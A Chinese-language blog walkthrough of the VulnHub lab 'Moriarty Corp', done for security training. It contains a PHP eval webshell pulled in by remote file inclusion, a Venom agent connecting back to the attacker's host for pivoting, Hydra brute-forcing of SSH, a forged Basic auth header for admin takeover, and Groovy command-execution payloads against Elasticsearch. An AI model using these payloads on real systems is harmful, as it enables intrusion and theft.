主要考察知識點

文件包含內網(wǎng)穿透命令上傳弱口令更改權限HTTP協(xié)議HeaderElasticSearch-CVE暴力破解

網(wǎng)絡拓撲

寫完之后把靶機的網(wǎng)絡拓撲也做了一下

寫在之前

這次用的虛擬機是VM_VirtualBox,第一次用，配置了許久，因為靶機是內網(wǎng)環(huán)境，所以有些網(wǎng)絡配置需要手動調整

網(wǎng)絡配置設置成如上，再次掃描IP，根據(jù)MAC地址就可以找到我們的靶機IP了。

靶機下載地址：

BoredHackerBlog: Moriarty Corp

滲透過程

IP發(fā)現(xiàn)
這里使用的windows的環(huán)境進行滲透測試，使用Advanced_IP_Scanner進行內網(wǎng)IP掃描

根據(jù)MAC地址發(fā)現(xiàn)IP，對獲取到的IP進行端口掃描

端口掃描

這里使用的是御劍端口掃描器進行發(fā)現(xiàn)

發(fā)現(xiàn)存在8000端口和9000端口可疑端口，嘗試進行WEB訪問

WEB滲透

訪問8000端口

是一個提交flag的頁面，同時顯示了我們的任務進度，首先根據(jù)提示提交第一個flag

再次顯示新的提示

結合強大的百度翻譯和谷歌翻譯，大概明白了讓我們從80端口開始滲透，然后在此提交flag，這個時候再次訪問80端口

已經(jīng)可以成功訪問了，正式開始我們的滲透過程

據(jù)url發(fā)現(xiàn)疑似存在文件包含漏洞，嘗試讀取一下敏感數(shù)據(jù)

成功讀取/etc/passwd文件，我們構造一下查看能否遠程包含webshell

首先在本地服務器構造webshell

<?php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ?>

嘗試遠程文件包含

成功包含遠程文件，使用蟻劍鏈接webshell

找尋flag和下一步的信息

在根目錄下發(fā)現(xiàn)flag文件

在8000頁面進行提交，提交完畢之后再次給了我們提示

大概意思就是告訴我們網(wǎng)站的web服務已經(jīng)沒有什么有價值的信息了，下一步需要內網(wǎng)滲透，同時給了我們內網(wǎng)的網(wǎng)段，下一步就是轉發(fā)流量進行內網(wǎng)滲透了

內網(wǎng)滲透-設置代理

設置內網(wǎng)代理，這里設置內網(wǎng)代理的方式有很多種，也可以使用MSF全程進行測試，因為為了方便，這里使用的是Venom&proxifier進行流量轉發(fā)

首先上傳agent服務端節(jié)點

在windows端啟動admin程序監(jiān)聽

admin.exe -lport 9999

在agent端修改程序權限為777，并執(zhí)行命令

./agent_linux_x64 -rhost 192.168.1.101 -rport 9999

成功監(jiān)聽到數(shù)據(jù)

設置sock5代理

設置proxifier

嘗試內網(wǎng)訪問靶機

成功訪問

下一步進行具體的內網(wǎng)漫游了

首先獲取一下內網(wǎng)存活的靶機，根據(jù)題目提示的網(wǎng)段進行掃描

發(fā)現(xiàn)172.17.0.4的靶機存在web頁面，嘗試訪問一下

發(fā)現(xiàn)是一個上傳文件的點，同時需要我們輸入密碼才能成功上傳，先burp抓包，跑一下常見的弱口令

抓到包了，嘗試fuzz一下密碼

當嘗試弱口令password時，顯示成功上傳…

根據(jù)反饋的頁面，嘗試訪問我們的webshell

代碼執(zhí)行成功，說明成功上傳，蟻劍連接一下

再次找到一個flag文件，嘗試在8000頁面提交

頁面再次給出了提示

大概的意思就是給了我們用戶名和加密的密碼，讓破解這些hash加密的密碼后嘗試ssh登陸

username: root toor admin mcorp moriarty password: 63a9f0ea7bb98050796b649e85481845 7b24afc8bc80e548d66c4e7ff72171c5 5f4dcc3b5aa765d61d8327deb882cf99 21232f297a57a5a743894a0e4a801fc3 084e0343a0486ff05530df6c705c8bb4 697c6cc76fdbde5baccb7b3400391e30 8839cfc8a0f24eb155ae3f7f205f5cbc 35ac704fe1cc7807c914af478f20fd35 b27a803ed346fbbf6d2e2eb88df1c51b 08552d48aa6d6d9c05dd67f1b4ba8747

同時提示我們密碼需要暴力枚舉，二話不說使用cmd5和somd5,最后查詢的結果：

再次掃描一下內網(wǎng)存在22端口的機子

發(fā)現(xiàn)172.17.0.5的SSH端口是開放的，根據(jù)獲取到的信息構造字典，使用SSH爆破工具進行爆破（最后使用Hydra進行爆破成功的）

獲取到密碼為：

root / weapons

使用xshell進行登陸

再次獲取到flag

我們在8000端口進行提交，再次更新了提示

大概意思就是內網(wǎng)里面還有個聊天的程序，端口不在80讓我們掃描一下他指定的幾個端口，同時給了一個賬戶，讓我們獲取管理員用戶的記錄，先用指定的端口掃描一下網(wǎng)段

發(fā)現(xiàn)172.17.0.6的8000端口是開放的，嘗試訪問一下

提示我們需要登陸，根據(jù)剛才提示給我們的賬戶進行登陸

Here are the credentials our agent has obtained from another source: username: buyer13 password: arms13

登陸成功

發(fā)現(xiàn)網(wǎng)站有兩個功能，查看聊天記錄，修改密碼，嘗試訪問修改密碼頁面，抓一下包，看看是否存在任意用戶密碼重置

修改用戶名為admin

瀏覽數(shù)據(jù)包，發(fā)現(xiàn)在header頭中存在問題

Authorization: Basic YnV5ZXIxMzphcm1zMTM=

解密一下

攜帶的是用戶的姓名和密碼，我們嘗試構造一下管理員的身份并修改密碼為admin

Authorization: Basic YWRtaW46YWRtaW4=

回到web頁面，重新登陸，或者更改header頭訪問

成功登陸admin用戶，訪問chats

再次獲取到flag，提交

我看了半天，這不是ES嘛，最近做項目正在用的東西，真是巧兒他媽給巧兒開門，巧兒到家了，掃描一下網(wǎng)段的9200端口

訪問一下頁面，標準的ES搜索頁面

嘗試一下ES的任意代碼執(zhí)行漏洞

構造數(shù)據(jù)包，創(chuàng)建一條數(shù)據(jù)

POST /mitian/mitian6/ HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 19 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close{ "name": "pdsdt"}

之后再search頁面進行構造

POST /_search?pretty HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 156 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}

成功執(zhí)行命令，讀取一下flag

成功獲取到flag文件，提交

顯示任務完成，并將我們的IP加入了黑名單，真就卸磨殺驢

總結

這個靶機花了我大半天的時間，主要還是在網(wǎng)絡配置上面的捯飭，內網(wǎng)的靶機每一個都不太難，重要的就是如何通過流量轉發(fā)后正確的使用一些工具達到掃描端口爆破服務的目的，總體的收獲還是挺大的，雖然和真實環(huán)境相比確實差別較大，但剛好最近就在用ES這方面的產(chǎn)品，也趁著這個機會對于ES的相關漏洞也加強了學習。

問題

有沒有想學網(wǎng)絡安全但又不知道該怎么入手的朋友啊？

我這里整理的大部分的學習資料，有需要沒有

總結

以上是生活随笔為你收集整理的vulnhub_内网渗透测试的记录——网络安全的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。